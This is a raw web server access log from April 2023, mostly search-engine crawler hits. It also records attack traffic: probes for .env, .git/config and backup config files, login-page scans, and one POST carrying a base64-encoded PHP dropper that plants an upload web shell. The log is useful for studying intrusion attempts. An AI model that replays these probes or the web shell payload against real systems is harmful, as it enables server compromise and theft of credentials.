66.249.71.178 - - [12/Apr/2023:23:42:02 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.229 - - [13/Apr/2023:05:33:16 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.47 - - [13/Apr/2023:08:07:02 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.137 - - [13/Apr/2023:12:28:32 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.26 - - [13/Apr/2023:20:59:09 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.214 - - [13/Apr/2023:22:08:25 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.178 - - [13/Apr/2023:22:08:33 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.146 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.17 - - [13/Apr/2023:22:34:17 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.146 - - [14/Apr/2023:01:49:25 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.177 - - [14/Apr/2023:16:48:32 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.210 - - [14/Apr/2023:18:42:26 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.210 - - [14/Apr/2023:18:42:30 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.17 - - [14/Apr/2023:18:42:39 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.19 - - [14/Apr/2023:21:50:03 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.68.25 - - [14/Apr/2023:22:04:28 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.195 - - [15/Apr/2023:01:37:06 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
134.209.178.186 - - [15/Apr/2023:04:48:51 +0700] "HEAD / HTTP/1.1" 302 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
134.209.178.186 - - [15/Apr/2023:04:48:54 +0700] "GET /wp-login.php HTTP/1.1" 302 229 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
134.209.178.186 - - [15/Apr/2023:04:48:55 +0700] "GET /wordpress/wp-login.php HTTP/1.1" 302 239 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
134.209.178.186 - - [15/Apr/2023:04:48:56 +0700] "GET /blog/wp-login.php HTTP/1.1" 302 234 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
134.209.178.186 - - [15/Apr/2023:04:48:56 +0700] "GET /wp/wp-login.php HTTP/1.1" 302 232 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
66.249.71.182 - - [15/Apr/2023:06:42:26 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.180 - - [15/Apr/2023:10:30:20 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.21 - - [15/Apr/2023:10:30:20 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.164.86.43 - - [15/Apr/2023:16:15:24 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
103.131.71.182 - - [15/Apr/2023:17:42:01 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
195.3.222.51 - - [15/Apr/2023:19:42:37 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.3.222.51 - - [15/Apr/2023:19:42:38 +0700] "GET /.env HTTP/1.1" 302 221 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.3.222.51 - - [15/Apr/2023:19:42:39 +0700] "POST / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.3.222.51 - - [15/Apr/2023:19:42:42 +0700] "GET /_profiler/phpinfo HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.3.222.51 - - [15/Apr/2023:19:42:43 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 302 248 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.3.222.51 - - [15/Apr/2023:19:42:43 +0700] "GET /config.json HTTP/1.1" 302 228 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
195.3.222.51 - - [15/Apr/2023:19:42:44 +0700] "GET /.git/config HTTP/1.1" 302 228 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.131.71.28 - - [15/Apr/2023:21:51:55 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.210 - - [15/Apr/2023:22:04:34 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.39.131.196 - - [16/Apr/2023:02:51:13 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; +http://url-classification.io/wiki/index.php?title=URL_server_crawler) KStandBot/1.0"
103.131.71.217 - - [16/Apr/2023:05:39:09 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.46 - - [16/Apr/2023:09:01:14 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.144 - - [16/Apr/2023:12:29:43 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.214 - - [16/Apr/2023:22:04:40 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.178 - - [16/Apr/2023:22:04:41 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.44 - - [17/Apr/2023:09:40:32 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
222.127.223.210 - - [17/Apr/2023:16:02:00 +0700] "GET /wp-login.php HTTP/1.1" 302 229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
222.127.223.210 - - [17/Apr/2023:16:02:00 +0700] "GET /xmlrpc.php HTTP/1.1" 302 227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
66.249.68.21 - - [17/Apr/2023:21:34:53 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.178 - - [17/Apr/2023:21:34:54 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
140.238.48.138 - - [17/Apr/2023:23:29:15 +0700] "GET /style.php?sig=update&domain=51.79.124.111 HTTP/1.1" 302 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.131.71.19 - - [18/Apr/2023:03:22:48 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
212.87.204.66 - - [18/Apr/2023:05:31:43 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "python-requests/2.28.2"
212.87.204.66 - - [18/Apr/2023:06:56:13 +0700] "GET /administrator/index.php HTTP/1.1" 302 240 "-" "python-requests/2.28.2"
103.131.71.159 - - [18/Apr/2023:13:03:43 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.40 - - [18/Apr/2023:14:57:14 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
140.238.48.138 - - [18/Apr/2023:19:59:59 +0700] "POST //wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CMWRDQnVZVzFsUFNKZklpQjBlWEJsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5PMmxtS0NSZlVFOVRWQ2w3YVdZb1FHTnZjSGtvSkY5R1NVeEZVMXNuWDE4blhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWDE4blhWc25ibUZ0WlNkZEtTbDdaV05vYnlBblQwc25PMzFsYkhObGUyVmphRzhnSjBWU0p6dDlmVDgrJzsKICAkZm4gPSAndXBsb2FkZXIucGhwJzsKICBpZiggZnVuY3Rpb25fZXhpc3RzKCdmaWxlX3B1dF9jb250ZW50cycpICkgewogICAgZmlsZV9wdXRfY29udGVudHMoJGZuLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogIH1lbHNlewogICAgQHRvdWNoKCRmbik7CiAgICBpZighJGZvID0gZm9wZW4oJGZuLCAnYScpKSB7CiAgICAgIGVjaG8gJ2Vycm9yJzsKICAgICAgZXhpdDsKICAgIH07CiAgICBmd3JpdGUoJGZvLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogICAgZmNsb3NlKCRmbyk7CiAgfQogIGlmKCBmaWxlX2V4aXN0cygkZm4pICkgewogICAgZWNobyAnYURyaXY0JzsKICAgIGV4aXQ7CiAgfQ== HTTP/1.1" 302 1212 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.71.210 - - [18/Apr/2023:21:35:02 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.212 - - [18/Apr/2023:21:35:03 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.98 - - [19/Apr/2023:05:34:18 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
158.101.151.135 - - [19/Apr/2023:06:56:13 +0700] "GET /style.php?sig=update&domain=51.79.124.111 HTTP/1.1" 302 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.131.71.170 - - [19/Apr/2023:13:44:02 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.31 - - [19/Apr/2023:14:24:35 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.182 - - [19/Apr/2023:21:35:02 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.180 - - [19/Apr/2023:21:35:02 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.32 - - [20/Apr/2023:07:35:29 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.65 - - [20/Apr/2023:09:11:12 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
66.249.72.180 - - [20/Apr/2023:21:05:05 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.180 - - [20/Apr/2023:21:05:08 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.38 - - [20/Apr/2023:23:40:59 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.228 - - [21/Apr/2023:02:26:58 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.45 - - [21/Apr/2023:07:16:43 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
139.59.31.218 - - [21/Apr/2023:16:46:07 +0700] "HEAD / HTTP/1.1" 302 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36"
139.59.31.218 - - [21/Apr/2023:16:46:09 +0700] "GET /wp-login.php HTTP/1.1" 302 229 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36"
139.59.31.218 - - [21/Apr/2023:16:46:09 +0700] "GET /wordpress/wp-login.php HTTP/1.1" 302 239 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36"
139.59.31.218 - - [21/Apr/2023:16:46:10 +0700] "GET /blog/wp-login.php HTTP/1.1" 302 234 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36"
139.59.31.218 - - [21/Apr/2023:16:46:10 +0700] "GET /wp/wp-login.php HTTP/1.1" 302 232 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36"
66.249.71.210 - - [21/Apr/2023:21:05:09 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.210 - - [21/Apr/2023:21:05:09 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.151 - - [22/Apr/2023:07:13:45 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
199.47.82.16 - - [22/Apr/2023:09:44:20 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Turnitin (https://bit.ly/2UvnfoQ)"
57.128.17.132 - - [22/Apr/2023:15:37:16 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
103.131.71.18 - - [22/Apr/2023:17:24:12 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.70.180 - - [22/Apr/2023:20:35:14 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.214 - - [22/Apr/2023:20:35:15 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.80 - - [22/Apr/2023:23:17:16 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.35 - - [23/Apr/2023:00:54:08 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.68.25 - - [23/Apr/2023:20:05:19 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.17 - - [23/Apr/2023:20:05:19 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.159 - - [23/Apr/2023:20:24:02 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.202 - - [24/Apr/2023:01:31:20 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
54.74.185.134 - - [24/Apr/2023:02:25:17 +0700] "GET /.env HTTP/1.1" 302 221 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [24/Apr/2023:02:25:27 +0700] "POST / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [24/Apr/2023:02:25:38 +0700] "GET /sendgrid/.env HTTP/1.1" 302 230 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [24/Apr/2023:02:25:41 +0700] "POST / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.131.71.165 - - [24/Apr/2023:14:12:34 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.26 - - [24/Apr/2023:16:28:42 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.214 - - [24/Apr/2023:19:35:23 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.180 - - [24/Apr/2023:19:35:30 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.161 - - [24/Apr/2023:22:28:51 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.23 - - [25/Apr/2023:00:06:56 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.212 - - [25/Apr/2023:01:52:16 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.142 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.91.78.10 - - [25/Apr/2023:08:20:21 +0700] "POST /administrator/index.php HTTP/1.1" 302 240 "-" "python-requests/2.28.2"
77.91.78.10 - - [25/Apr/2023:08:20:24 +0700] "POST /administrator/index.php HTTP/1.1" 302 240 "-" "python-requests/2.28.2"
66.249.70.182 - - [25/Apr/2023:10:03:51 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.180 - - [25/Apr/2023:10:03:51 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.42 - - [25/Apr/2023:15:46:07 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.71.212 - - [25/Apr/2023:19:35:27 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.74.185.134 - - [25/Apr/2023:23:08:45 +0700] "GET /_profiler/phpinfo HTTP/1.1" 302 234 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:46 +0700] "POST / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:47 +0700] "POST /debug/default/view?panel=config HTTP/1.1" 302 248 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:48 +0700] "POST /tool/view/phpinfo.view.php HTTP/1.1" 302 243 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:48 +0700] "POST /wp-config.php-backup HTTP/1.1" 302 237 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:49 +0700] "POST /%C0 HTTP/1.1" 302 220 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:51 +0700] "POST /debug/default/view.html HTTP/1.1" 302 240 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:53 +0700] "POST /debug/default/view HTTP/1.1" 302 235 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:55 +0700] "POST /frontend/web/debug/default/view HTTP/1.1" 302 248 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:56 +0700] "POST /web/debug/default/view HTTP/1.1" 302 239 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:58 +0700] "POST /sapi/debug/default/view HTTP/1.1" 302 240 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.74.185.134 - - [25/Apr/2023:23:08:59 +0700] "POST /debug/default/view?panel=config HTTP/1.1" 302 248 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.131.71.167 - - [26/Apr/2023:01:30:33 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.141 - - [26/Apr/2023:08:09:20 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
103.131.71.30 - - [26/Apr/2023:16:24:40 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
66.249.70.178 - - [26/Apr/2023:19:05:32 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
